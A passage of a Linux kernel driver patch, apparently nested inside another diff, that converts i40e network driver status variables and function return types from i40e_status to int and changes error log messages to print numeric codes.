+@@ -5475,8 +5474,8 @@ static int i40e_get_module_info(struct net_device *netdev,
+ 	u32 sff8472_comp = 0;
+ 	u32 sff8472_swap = 0;
+ 	u32 sff8636_rev = 0;
+-	i40e_status status;
+ 	u32 type = 0;
++	int status;
+ 
+ 	/* Check if firmware supports reading module EEPROM. */
+ 	if (!(hw->flags & I40E_HW_FLAG_AQ_PHY_ACCESS_CAPABLE)) {
+@@ -5580,8 +5579,8 @@ static int i40e_get_module_eeprom(struct net_device *netdev,
+ 	struct i40e_pf *pf = vsi->back;
+ 	struct i40e_hw *hw = &pf->hw;
+ 	bool is_sfp = false;
+-	i40e_status status;
+ 	u32 value = 0;
++	int status;
+ 	int i;
+ 
+ 	if (!ee || !ee->len || !data)
+@@ -5622,10 +5621,10 @@ static int i40e_get_eee(struct net_device *netdev, struct ethtool_eee *edata)
+ {
+ 	struct i40e_netdev_priv *np = netdev_priv(netdev);
+ 	struct i40e_aq_get_phy_abilities_resp phy_cfg;
+-	enum i40e_status_code status = 0;
+ 	struct i40e_vsi *vsi = np->vsi;
+ 	struct i40e_pf *pf = vsi->back;
+ 	struct i40e_hw *hw = &pf->hw;
++	int status = 0;
+ 
+ 	/* Get initial PHY capabilities */
+ 	status = i40e_aq_get_phy_capabilities(hw, false, true, &phy_cfg, NULL);
+@@ -5687,11 +5686,11 @@ static int i40e_set_eee(struct net_device *netdev, struct ethtool_eee *edata)
+ {
+ 	struct i40e_netdev_priv *np = netdev_priv(netdev);
+ 	struct i40e_aq_get_phy_abilities_resp abilities;
+-	enum i40e_status_code status = I40E_SUCCESS;
+ 	struct i40e_aq_set_phy_config config;
+ 	struct i40e_vsi *vsi = np->vsi;
+ 	struct i40e_pf *pf = vsi->back;
+ 	struct i40e_hw *hw = &pf->hw;
++	int status = I40E_SUCCESS;
+ 	__le16 eee_capability;
+ 
+ 	/* Deny parameters we don't support */
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_hmc.c b/drivers/net/ethernet/intel/i40e/i40e_hmc.c
+index 163ee8c6311cc..46f7950a0049a 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_hmc.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_hmc.c
+@@ -17,17 +17,17 @@
+  * @type: what type of segment descriptor we're manipulating
+  * @direct_mode_sz: size to alloc in direct mode
+  **/
+-i40e_status i40e_add_sd_table_entry(struct i40e_hw *hw,
+-					      struct i40e_hmc_info *hmc_info,
+-					      u32 sd_index,
+-					      enum i40e_sd_entry_type type,
+-					      u64 direct_mode_sz)
++int i40e_add_sd_table_entry(struct i40e_hw *hw,
++			    struct i40e_hmc_info *hmc_info,
++			    u32 sd_index,
++			    enum i40e_sd_entry_type type,
++			    u64 direct_mode_sz)
+ {
+ 	enum i40e_memory_type mem_type __attribute__((unused));
+ 	struct i40e_hmc_sd_entry *sd_entry;
+ 	bool dma_mem_alloc_done = false;
++	int ret_code = I40E_SUCCESS;
+ 	struct i40e_dma_mem mem;
+-	i40e_status ret_code = I40E_SUCCESS;
+ 	u64 alloc_len;
+ 
+ 	if (NULL == hmc_info->sd_table.sd_entry) {
+@@ -106,19 +106,19 @@ exit:
+  *	   aligned on 4K boundary and zeroed memory.
+  *	2. It should be 4K in size.
+  **/
+-i40e_status i40e_add_pd_table_entry(struct i40e_hw *hw,
+-					      struct i40e_hmc_info *hmc_info,
+-					      u32 pd_index,
+-					      struct i40e_dma_mem *rsrc_pg)
++int i40e_add_pd_table_entry(struct i40e_hw *hw,
++			    struct i40e_hmc_info *hmc_info,
++			    u32 pd_index,
++			    struct i40e_dma_mem *rsrc_pg)
+ {
+-	i40e_status ret_code = 0;
+ 	struct i40e_hmc_pd_table *pd_table;
+ 	struct i40e_hmc_pd_entry *pd_entry;
+ 	struct i40e_dma_mem mem;
+ 	struct i40e_dma_mem *page = &mem;
+ 	u32 sd_idx, rel_pd_idx;
+-	u64 *pd_addr;
++	int ret_code = 0;
+ 	u64 page_desc;
++	u64 *pd_addr;
+ 
+ 	if (pd_index / I40E_HMC_PD_CNT_IN_SD >= hmc_info->sd_table.sd_cnt) {
+ 		ret_code = I40E_ERR_INVALID_PAGE_DESC_INDEX;
+@@ -185,15 +185,15 @@ exit:
+  *	1. Caller can deallocate the memory used by backing storage after this
+  *	   function returns.
+  **/
+-i40e_status i40e_remove_pd_bp(struct i40e_hw *hw,
+-					struct i40e_hmc_info *hmc_info,
+-					u32 idx)
++int i40e_remove_pd_bp(struct i40e_hw *hw,
++		      struct i40e_hmc_info *hmc_info,
++		      u32 idx)
+ {
+-	i40e_status ret_code = 0;
+ 	struct i40e_hmc_pd_entry *pd_entry;
+ 	struct i40e_hmc_pd_table *pd_table;
+ 	struct i40e_hmc_sd_entry *sd_entry;
+ 	u32 sd_idx, rel_pd_idx;
++	int ret_code = 0;
+ 	u64 *pd_addr;
+ 
+ 	/* calculate index */
+@@ -241,11 +241,11 @@ exit:
+  * @hmc_info: pointer to the HMC configuration information structure
+  * @idx: the page index
+  **/
+-i40e_status i40e_prep_remove_sd_bp(struct i40e_hmc_info *hmc_info,
+-					     u32 idx)
++int i40e_prep_remove_sd_bp(struct i40e_hmc_info *hmc_info,
++			   u32 idx)
+ {
+-	i40e_status ret_code = 0;
+ 	struct i40e_hmc_sd_entry *sd_entry;
++	int ret_code = 0;
+ 
+ 	/* get the entry and decrease its ref counter */
+ 	sd_entry = &hmc_info->sd_table.sd_entry[idx];
+@@ -269,9 +269,9 @@ exit:
+  * @idx: the page index
+  * @is_pf: used to distinguish between VF and PF
+  **/
+-i40e_status i40e_remove_sd_bp_new(struct i40e_hw *hw,
+-					    struct i40e_hmc_info *hmc_info,
+-					    u32 idx, bool is_pf)
++int i40e_remove_sd_bp_new(struct i40e_hw *hw,
++			  struct i40e_hmc_info *hmc_info,
++			  u32 idx, bool is_pf)
+ {
+ 	struct i40e_hmc_sd_entry *sd_entry;
+ 
+@@ -290,11 +290,11 @@ i40e_status i40e_remove_sd_bp_new(struct i40e_hw *hw,
+  * @hmc_info: pointer to the HMC configuration information structure
+  * @idx: segment descriptor index to find the relevant page descriptor
+  **/
+-i40e_status i40e_prep_remove_pd_page(struct i40e_hmc_info *hmc_info,
+-					       u32 idx)
++int i40e_prep_remove_pd_page(struct i40e_hmc_info *hmc_info,
++			     u32 idx)
+ {
+-	i40e_status ret_code = 0;
+ 	struct i40e_hmc_sd_entry *sd_entry;
++	int ret_code = 0;
+ 
+ 	sd_entry = &hmc_info->sd_table.sd_entry[idx];
+ 
+@@ -318,9 +318,9 @@ exit:
+  * @idx: segment descriptor index to find the relevant page descriptor
+  * @is_pf: used to distinguish between VF and PF
+  **/
+-i40e_status i40e_remove_pd_page_new(struct i40e_hw *hw,
+-					      struct i40e_hmc_info *hmc_info,
+-					      u32 idx, bool is_pf)
++int i40e_remove_pd_page_new(struct i40e_hw *hw,
++			    struct i40e_hmc_info *hmc_info,
++			    u32 idx, bool is_pf)
+ {
+ 	struct i40e_hmc_sd_entry *sd_entry;
+ 
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_hmc.h b/drivers/net/ethernet/intel/i40e/i40e_hmc.h
+index 3113792afaffa..9960da07a5732 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_hmc.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_hmc.h
+@@ -187,28 +187,28 @@ struct i40e_hmc_info {
+ 	/* add one more to the limit to correct our range */		\
+ 	*(pd_limit) += 1;						\
+ }
+-i40e_status i40e_add_sd_table_entry(struct i40e_hw *hw,
+-					      struct i40e_hmc_info *hmc_info,
+-					      u32 sd_index,
+-					      enum i40e_sd_entry_type type,
+-					      u64 direct_mode_sz);
+-
+-i40e_status i40e_add_pd_table_entry(struct i40e_hw *hw,
+-					      struct i40e_hmc_info *hmc_info,
+-					      u32 pd_index,
+-					      struct i40e_dma_mem *rsrc_pg);
+-i40e_status i40e_remove_pd_bp(struct i40e_hw *hw,
+-					struct i40e_hmc_info *hmc_info,
+-					u32 idx);
+-i40e_status i40e_prep_remove_sd_bp(struct i40e_hmc_info *hmc_info,
+-					     u32 idx);
+-i40e_status i40e_remove_sd_bp_new(struct i40e_hw *hw,
+-					    struct i40e_hmc_info *hmc_info,
+-					    u32 idx, bool is_pf);
+-i40e_status i40e_prep_remove_pd_page(struct i40e_hmc_info *hmc_info,
+-					       u32 idx);
+-i40e_status i40e_remove_pd_page_new(struct i40e_hw *hw,
+-					      struct i40e_hmc_info *hmc_info,
+-					      u32 idx, bool is_pf);
++
++int i40e_add_sd_table_entry(struct i40e_hw *hw,
++			    struct i40e_hmc_info *hmc_info,
++			    u32 sd_index,
++			    enum i40e_sd_entry_type type,
++			    u64 direct_mode_sz);
++int i40e_add_pd_table_entry(struct i40e_hw *hw,
++			    struct i40e_hmc_info *hmc_info,
++			    u32 pd_index,
++			    struct i40e_dma_mem *rsrc_pg);
++int i40e_remove_pd_bp(struct i40e_hw *hw,
++		      struct i40e_hmc_info *hmc_info,
++		      u32 idx);
++int i40e_prep_remove_sd_bp(struct i40e_hmc_info *hmc_info,
++			   u32 idx);
++int i40e_remove_sd_bp_new(struct i40e_hw *hw,
++			  struct i40e_hmc_info *hmc_info,
++			  u32 idx, bool is_pf);
++int i40e_prep_remove_pd_page(struct i40e_hmc_info *hmc_info,
++			     u32 idx);
++int i40e_remove_pd_page_new(struct i40e_hw *hw,
++			    struct i40e_hmc_info *hmc_info,
++			    u32 idx, bool is_pf);
+ 
+ #endif /* _I40E_HMC_H_ */
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_lan_hmc.c b/drivers/net/ethernet/intel/i40e/i40e_lan_hmc.c
+index d6e92ecddfbd8..40c101f286d19 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_lan_hmc.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_lan_hmc.c
+@@ -74,12 +74,12 @@ static u64 i40e_calculate_l2fpm_size(u32 txq_num, u32 rxq_num,
+  * Assumptions:
+  *   - HMC Resource Profile has been selected before calling this function.
+  **/
+-i40e_status i40e_init_lan_hmc(struct i40e_hw *hw, u32 txq_num,
+-					u32 rxq_num, u32 fcoe_cntx_num,
+-					u32 fcoe_filt_num)
++int i40e_init_lan_hmc(struct i40e_hw *hw, u32 txq_num,
++		      u32 rxq_num, u32 fcoe_cntx_num,
++		      u32 fcoe_filt_num)
+ {
+ 	struct i40e_hmc_obj_info *obj, *full_obj;
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 	u64 l2fpm_size;
+ 	u32 size_exp;
+ 
+@@ -229,11 +229,11 @@ init_lan_hmc_out:
+  *	1. caller can deallocate the memory used by pd after this function
+  *	   returns.
+  **/
+-static i40e_status i40e_remove_pd_page(struct i40e_hw *hw,
+-						 struct i40e_hmc_info *hmc_info,
+-						 u32 idx)
++static int i40e_remove_pd_page(struct i40e_hw *hw,
++			       struct i40e_hmc_info *hmc_info,
++			       u32 idx)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 
+ 	if (!i40e_prep_remove_pd_page(hmc_info, idx))
+ 		ret_code = i40e_remove_pd_page_new(hw, hmc_info, idx, true);
+@@ -256,11 +256,11 @@ static i40e_status i40e_remove_pd_page(struct i40e_hw *hw,
+  *	1. caller can deallocate the memory used by backing storage after this
+  *	   function returns.
+  **/
+-static i40e_status i40e_remove_sd_bp(struct i40e_hw *hw,
+-					       struct i40e_hmc_info *hmc_info,
+-					       u32 idx)
++static int i40e_remove_sd_bp(struct i40e_hw *hw,
++			     struct i40e_hmc_info *hmc_info,
++			     u32 idx)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 
+ 	if (!i40e_prep_remove_sd_bp(hmc_info, idx))
+ 		ret_code = i40e_remove_sd_bp_new(hw, hmc_info, idx, true);
+@@ -276,15 +276,15 @@ static i40e_status i40e_remove_sd_bp(struct i40e_hw *hw,
+  * This will allocate memory for PDs and backing pages and populate
+  * the sd and pd entries.
+  **/
+-static i40e_status i40e_create_lan_hmc_object(struct i40e_hw *hw,
+-				struct i40e_hmc_lan_create_obj_info *info)
++static int i40e_create_lan_hmc_object(struct i40e_hw *hw,
++				      struct i40e_hmc_lan_create_obj_info *info)
+ {
+-	i40e_status ret_code = 0;
+ 	struct i40e_hmc_sd_entry *sd_entry;
+ 	u32 pd_idx1 = 0, pd_lmt1 = 0;
+ 	u32 pd_idx = 0, pd_lmt = 0;
+ 	bool pd_error = false;
+ 	u32 sd_idx, sd_lmt;
++	int ret_code = 0;
+ 	u64 sd_size;
+ 	u32 i, j;
+ 
+@@ -435,13 +435,13 @@ exit:
+  * - This function will be called after i40e_init_lan_hmc() and before
+  *   any LAN/FCoE HMC objects can be created.
+  **/
+-i40e_status i40e_configure_lan_hmc(struct i40e_hw *hw,
+-					     enum i40e_hmc_model model)
++int i40e_configure_lan_hmc(struct i40e_hw *hw,
++			   enum i40e_hmc_model model)
+ {
+ 	struct i40e_hmc_lan_create_obj_info info;
+-	i40e_status ret_code = 0;
+ 	u8 hmc_fn_id = hw->hmc.hmc_fn_id;
+ 	struct i40e_hmc_obj_info *obj;
++	int ret_code = 0;
+ 
+ 	/* Initialize part of the create object info struct */
+ 	info.hmc_info = &hw->hmc;
+@@ -520,13 +520,13 @@ configure_lan_hmc_out:
+  * caller should deallocate memory allocated previously for
+  * book-keeping information about PDs and backing storage.
+  **/
+-static i40e_status i40e_delete_lan_hmc_object(struct i40e_hw *hw,
+-				struct i40e_hmc_lan_delete_obj_info *info)
++static int i40e_delete_lan_hmc_object(struct i40e_hw *hw,
++				      struct i40e_hmc_lan_delete_obj_info *info)
+ {
+-	i40e_status ret_code = 0;
+ 	struct i40e_hmc_pd_table *pd_table;
+ 	u32 pd_idx, pd_lmt, rel_pd_idx;
+ 	u32 sd_idx, sd_lmt;
++	int ret_code = 0;
+ 	u32 i, j;
+ 
+ 	if (NULL == info) {
+@@ -632,10 +632,10 @@ exit:
+  * This must be called by drivers as they are shutting down and being
+  * removed from the OS.
+  **/
+-i40e_status i40e_shutdown_lan_hmc(struct i40e_hw *hw)
++int i40e_shutdown_lan_hmc(struct i40e_hw *hw)
+ {
+ 	struct i40e_hmc_lan_delete_obj_info info;
+-	i40e_status ret_code;
++	int ret_code;
+ 
+ 	info.hmc_info = &hw->hmc;
+ 	info.rsrc_type = I40E_HMC_LAN_FULL;
+@@ -915,9 +915,9 @@ static void i40e_write_qword(u8 *hmc_bits,
+  * @context_bytes: pointer to the context bit array (DMA memory)
+  * @hmc_type: the type of HMC resource
+  **/
+-static i40e_status i40e_clear_hmc_context(struct i40e_hw *hw,
+-					u8 *context_bytes,
+-					enum i40e_hmc_lan_rsrc_type hmc_type)
++static int i40e_clear_hmc_context(struct i40e_hw *hw,
++				  u8 *context_bytes,
++				  enum i40e_hmc_lan_rsrc_type hmc_type)
+ {
+ 	/* clean the bit array */
+ 	memset(context_bytes, 0, (u32)hw->hmc.hmc_obj[hmc_type].size);
+@@ -931,9 +931,9 @@ static i40e_status i40e_clear_hmc_context(struct i40e_hw *hw,
+  * @ce_info:  a description of the struct to be filled
+  * @dest:     the struct to be filled
+  **/
+-static i40e_status i40e_set_hmc_context(u8 *context_bytes,
+-					struct i40e_context_ele *ce_info,
+-					u8 *dest)
++static int i40e_set_hmc_context(u8 *context_bytes,
++				struct i40e_context_ele *ce_info,
++				u8 *dest)
+ {
+ 	int f;
+ 
+@@ -973,18 +973,18 @@ static i40e_status i40e_set_hmc_context(u8 *context_bytes,
+  * base pointer.  This function is used for LAN Queue contexts.
+  **/
+ static
+-i40e_status i40e_hmc_get_object_va(struct i40e_hw *hw, u8 **object_base,
+-				   enum i40e_hmc_lan_rsrc_type rsrc_type,
+-				   u32 obj_idx)
++int i40e_hmc_get_object_va(struct i40e_hw *hw, u8 **object_base,
++			   enum i40e_hmc_lan_rsrc_type rsrc_type,
++			   u32 obj_idx)
+ {
+ 	struct i40e_hmc_info *hmc_info = &hw->hmc;
+ 	u32 obj_offset_in_sd, obj_offset_in_pd;
+ 	struct i40e_hmc_sd_entry *sd_entry;
+ 	struct i40e_hmc_pd_entry *pd_entry;
+ 	u32 pd_idx, pd_lmt, rel_pd_idx;
+-	i40e_status ret_code = 0;
+ 	u64 obj_offset_in_fpm;
+ 	u32 sd_idx, sd_lmt;
++	int ret_code = 0;
+ 
+ 	if (NULL == hmc_info) {
+ 		ret_code = I40E_ERR_BAD_PTR;
+@@ -1042,11 +1042,11 @@ exit:
+  * @hw:    the hardware struct
+  * @queue: the queue we care about
+  **/
+-i40e_status i40e_clear_lan_tx_queue_context(struct i40e_hw *hw,
+-						      u16 queue)
++int i40e_clear_lan_tx_queue_context(struct i40e_hw *hw,
++				    u16 queue)
+ {
+-	i40e_status err;
+ 	u8 *context_bytes;
++	int err;
+ 
+ 	err = i40e_hmc_get_object_va(hw, &context_bytes,
+ 				     I40E_HMC_LAN_TX, queue);
+@@ -1062,12 +1062,12 @@ i40e_status i40e_clear_lan_tx_queue_context(struct i40e_hw *hw,
+  * @queue: the queue we care about
+  * @s:     the struct to be filled
+  **/
+-i40e_status i40e_set_lan_tx_queue_context(struct i40e_hw *hw,
+-						    u16 queue,
+-						    struct i40e_hmc_obj_txq *s)
++int i40e_set_lan_tx_queue_context(struct i40e_hw *hw,
++				  u16 queue,
++				  struct i40e_hmc_obj_txq *s)
+ {
+-	i40e_status err;
+ 	u8 *context_bytes;
++	int err;
+ 
+ 	err = i40e_hmc_get_object_va(hw, &context_bytes,
+ 				     I40E_HMC_LAN_TX, queue);
+@@ -1083,11 +1083,11 @@ i40e_status i40e_set_lan_tx_queue_context(struct i40e_hw *hw,
+  * @hw:    the hardware struct
+  * @queue: the queue we care about
+  **/
+-i40e_status i40e_clear_lan_rx_queue_context(struct i40e_hw *hw,
+-						      u16 queue)
++int i40e_clear_lan_rx_queue_context(struct i40e_hw *hw,
++				    u16 queue)
+ {
+-	i40e_status err;
+ 	u8 *context_bytes;
++	int err;
+ 
+ 	err = i40e_hmc_get_object_va(hw, &context_bytes,
+ 				     I40E_HMC_LAN_RX, queue);
+@@ -1103,12 +1103,12 @@ i40e_status i40e_clear_lan_rx_queue_context(struct i40e_hw *hw,
+  * @queue: the queue we care about
+  * @s:     the struct to be filled
+  **/
+-i40e_status i40e_set_lan_rx_queue_context(struct i40e_hw *hw,
+-						    u16 queue,
+-						    struct i40e_hmc_obj_rxq *s)
++int i40e_set_lan_rx_queue_context(struct i40e_hw *hw,
++				  u16 queue,
++				  struct i40e_hmc_obj_rxq *s)
+ {
+-	i40e_status err;
+ 	u8 *context_bytes;
++	int err;
+ 
+ 	err = i40e_hmc_get_object_va(hw, &context_bytes,
+ 				     I40E_HMC_LAN_RX, queue);
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_lan_hmc.h b/drivers/net/ethernet/intel/i40e/i40e_lan_hmc.h
+index c46a2c449e60e..9f960404c2b37 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_lan_hmc.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_lan_hmc.h
+@@ -137,22 +137,22 @@ struct i40e_hmc_lan_delete_obj_info {
+ 	u32 count;
+ };
+ 
+-i40e_status i40e_init_lan_hmc(struct i40e_hw *hw, u32 txq_num,
+-					u32 rxq_num, u32 fcoe_cntx_num,
+-					u32 fcoe_filt_num);
+-i40e_status i40e_configure_lan_hmc(struct i40e_hw *hw,
+-					     enum i40e_hmc_model model);
+-i40e_status i40e_shutdown_lan_hmc(struct i40e_hw *hw);
+-
+-i40e_status i40e_clear_lan_tx_queue_context(struct i40e_hw *hw,
+-						      u16 queue);
+-i40e_status i40e_set_lan_tx_queue_context(struct i40e_hw *hw,
+-						    u16 queue,
+-						    struct i40e_hmc_obj_txq *s);
+-i40e_status i40e_clear_lan_rx_queue_context(struct i40e_hw *hw,
+-						      u16 queue);
+-i40e_status i40e_set_lan_rx_queue_context(struct i40e_hw *hw,
+-						    u16 queue,
+-						    struct i40e_hmc_obj_rxq *s);
++int i40e_init_lan_hmc(struct i40e_hw *hw, u32 txq_num,
++		      u32 rxq_num, u32 fcoe_cntx_num,
++		      u32 fcoe_filt_num);
++int i40e_configure_lan_hmc(struct i40e_hw *hw,
++			   enum i40e_hmc_model model);
++int i40e_shutdown_lan_hmc(struct i40e_hw *hw);
++
++int i40e_clear_lan_tx_queue_context(struct i40e_hw *hw,
++				    u16 queue);
++int i40e_set_lan_tx_queue_context(struct i40e_hw *hw,
++				  u16 queue,
++				  struct i40e_hmc_obj_txq *s);
++int i40e_clear_lan_rx_queue_context(struct i40e_hw *hw,
++				    u16 queue);
++int i40e_set_lan_rx_queue_context(struct i40e_hw *hw,
++				  u16 queue,
++				  struct i40e_hmc_obj_rxq *s);
+ 
+ #endif /* _I40E_LAN_HMC_H_ */
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c
+index 68f390ce4f6e2..0e01b1927c1c6 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_main.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_main.c
+@@ -1817,13 +1817,13 @@ static int i40e_set_mac(struct net_device *netdev, void *p)
+ 	spin_unlock_bh(&vsi->mac_filter_hash_lock);
+ 
+ 	if (vsi->type == I40E_VSI_MAIN) {
+-		i40e_status ret;
++		int ret;
+ 
+ 		ret = i40e_aq_mac_address_write(hw, I40E_AQC_WRITE_TYPE_LAA_WOL,
+ 						addr->sa_data, NULL);
+ 		if (ret)
+-			netdev_info(netdev, "Ignoring error from firmware on LAA update, status %s, AQ ret %s\n",
+-				    i40e_stat_str(hw, ret),
++			netdev_info(netdev, "Ignoring error from firmware on LAA update, status %d, AQ ret %s\n",
++				    ret,
+ 				    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 	}
+ 
+@@ -1854,8 +1854,8 @@ static int i40e_config_rss_aq(struct i40e_vsi *vsi, const u8 *seed,
+ 		ret = i40e_aq_set_rss_key(hw, vsi->id, seed_dw);
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "Cannot set RSS key, err %s aq_err %s\n",
+-				 i40e_stat_str(hw, ret),
++				 "Cannot set RSS key, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 			return ret;
+ 		}
+@@ -1866,8 +1866,8 @@ static int i40e_config_rss_aq(struct i40e_vsi *vsi, const u8 *seed,
+ 		ret = i40e_aq_set_rss_lut(hw, vsi->id, pf_lut, lut, lut_size);
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "Cannot set RSS lut, err %s aq_err %s\n",
+-				 i40e_stat_str(hw, ret),
++				 "Cannot set RSS lut, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 			return ret;
+ 		}
+@@ -2349,7 +2349,7 @@ void i40e_aqc_del_filters(struct i40e_vsi *vsi, const char *vsi_name,
+ {
+ 	struct i40e_hw *hw = &vsi->back->hw;
+ 	enum i40e_admin_queue_err aq_status;
+-	i40e_status aq_ret;
++	int aq_ret;
+ 
+ 	aq_ret = i40e_aq_remove_macvlan_v2(hw, vsi->seid, list, num_del, NULL,
+ 					   &aq_status);
+@@ -2358,8 +2358,8 @@ void i40e_aqc_del_filters(struct i40e_vsi *vsi, const char *vsi_name,
+ 	if (aq_ret && !(aq_status == I40E_AQ_RC_ENOENT)) {
+ 		*retval = -EIO;
+ 		dev_info(&vsi->back->pdev->dev,
+-			 "ignoring delete macvlan error on %s, err %s, aq_err %s\n",
+-			 vsi_name, i40e_stat_str(hw, aq_ret),
++			 "ignoring delete macvlan error on %s, err %d, aq_err %s\n",
++			 vsi_name, aq_ret,
+ 			 i40e_aq_str(hw, aq_status));
+ 	}
+ }
+@@ -2423,13 +2423,13 @@ void i40e_aqc_add_filters(struct i40e_vsi *vsi, const char *vsi_name,
+  *
+  * Returns status indicating success or failure;
+  **/
+-static i40e_status
++static int
+ i40e_aqc_broadcast_filter(struct i40e_vsi *vsi, const char *vsi_name,
+ 			  struct i40e_mac_filter *f)
+ {
+ 	bool enable = f->state == I40E_FILTER_NEW;
+ 	struct i40e_hw *hw = &vsi->back->hw;
+-	i40e_status aq_ret;
++	int aq_ret;
+ 
+ 	if (f->vlan == I40E_VLAN_ANY) {
+ 		aq_ret = i40e_aq_set_vsi_broadcast(hw,
+@@ -2468,7 +2468,7 @@ static int i40e_set_promiscuous(struct i40e_pf *pf, bool promisc)
+ {
+ 	struct i40e_vsi *vsi = pf->vsi[pf->lan_vsi];
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status aq_ret;
++	int aq_ret;
+ 
+ 	if (vsi->type == I40E_VSI_MAIN &&
+ 	    pf->lan_veb != I40E_NO_VEB &&
+@@ -2488,8 +2488,8 @@ static int i40e_set_promiscuous(struct i40e_pf *pf, bool promisc)
+ 							   NULL);
+ 		if (aq_ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "Set default VSI failed, err %s, aq_err %s\n",
+-				 i40e_stat_str(hw, aq_ret),
++				 "Set default VSI failed, err %d, aq_err %s\n",
++				 aq_ret,
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		}
+ 	} else {
+@@ -2500,8 +2500,8 @@ static int i40e_set_promiscuous(struct i40e_pf *pf, bool promisc)
+ 						  true);
+ 		if (aq_ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "set unicast promisc failed, err %s, aq_err %s\n",
+-				 i40e_stat_str(hw, aq_ret),
++				 "set unicast promisc failed, err %d, aq_err %s\n",
++				 aq_ret,
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		}
+ 		aq_ret = i40e_aq_set_vsi_multicast_promiscuous(
+@@ -2510,8 +2510,8 @@ static int i40e_set_promiscuous(struct i40e_pf *pf, bool promisc)
+ 						  promisc, NULL);
+ 		if (aq_ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "set multicast promisc failed, err %s, aq_err %s\n",
+-				 i40e_stat_str(hw, aq_ret),
++				 "set multicast promisc failed, err %d, aq_err %s\n",
++				 aq_ret,
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		}
+ 	}
+@@ -2541,12 +2541,12 @@ int i40e_sync_vsi_filters(struct i40e_vsi *vsi)
+ 	unsigned int vlan_filters = 0;
+ 	char vsi_name[16] = "PF";
+ 	int filter_list_len = 0;
+-	i40e_status aq_ret = 0;
+ 	u32 changed_flags = 0;
+ 	struct hlist_node *h;
+ 	struct i40e_pf *pf;
+ 	int num_add = 0;
+ 	int num_del = 0;
++	int aq_ret = 0;
+ 	int retval = 0;
+ 	u16 cmd_flags;
+ 	int list_size;
+@@ -2814,9 +2814,9 @@ int i40e_sync_vsi_filters(struct i40e_vsi *vsi)
+ 			retval = i40e_aq_rc_to_posix(aq_ret,
+ 						     hw->aq.asq_last_status);
+ 			dev_info(&pf->pdev->dev,
+-				 "set multi promisc failed on %s, err %s aq_err %s\n",
++				 "set multi promisc failed on %s, err %d aq_err %s\n",
+ 				 vsi_name,
+-				 i40e_stat_str(hw, aq_ret),
++				 aq_ret,
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		} else {
+ 			dev_info(&pf->pdev->dev, "%s allmulti mode.\n",
+@@ -2834,10 +2834,10 @@ int i40e_sync_vsi_filters(struct i40e_vsi *vsi)
+ 			retval = i40e_aq_rc_to_posix(aq_ret,
+ 						     hw->aq.asq_last_status);
+ 			dev_info(&pf->pdev->dev,
+-				 "Setting promiscuous %s failed on %s, err %s aq_err %s\n",
++				 "Setting promiscuous %s failed on %s, err %d aq_err %s\n",
+ 				 cur_promisc ? "on" : "off",
+ 				 vsi_name,
+-				 i40e_stat_str(hw, aq_ret),
++				 aq_ret,
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		}
+ 	}
+@@ -2965,7 +2965,7 @@ int i40e_ioctl(struct net_device *netdev, struct ifreq *ifr, int cmd)
+ void i40e_vlan_stripping_enable(struct i40e_vsi *vsi)
+ {
+ 	struct i40e_vsi_context ctxt;
+-	i40e_status ret;
++	int ret;
+ 
+ 	/* Don't modify stripping options if a port VLAN is active */
+ 	if (vsi->info.pvid)
+@@ -2985,8 +2985,8 @@ void i40e_vlan_stripping_enable(struct i40e_vsi *vsi)
+ 	ret = i40e_aq_update_vsi_params(&vsi->back->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&vsi->back->pdev->dev,
+-			 "update vlan stripping failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&vsi->back->hw, ret),
++			 "update vlan stripping failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&vsi->back->hw,
+ 				     vsi->back->hw.aq.asq_last_status));
+ 	}
+@@ -2999,7 +2999,7 @@ void i40e_vlan_stripping_enable(struct i40e_vsi *vsi)
+ void i40e_vlan_stripping_disable(struct i40e_vsi *vsi)
+ {
+ 	struct i40e_vsi_context ctxt;
+-	i40e_status ret;
++	int ret;
+ 
+ 	/* Don't modify stripping options if a port VLAN is active */
+ 	if (vsi->info.pvid)
+@@ -3020,8 +3020,8 @@ void i40e_vlan_stripping_disable(struct i40e_vsi *vsi)
+ 	ret = i40e_aq_update_vsi_params(&vsi->back->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&vsi->back->pdev->dev,
+-			 "update vlan stripping failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&vsi->back->hw, ret),
++			 "update vlan stripping failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&vsi->back->hw,
+ 				     vsi->back->hw.aq.asq_last_status));
+ 	}
+@@ -3252,7 +3252,7 @@ static void i40e_restore_vlan(struct i40e_vsi *vsi)
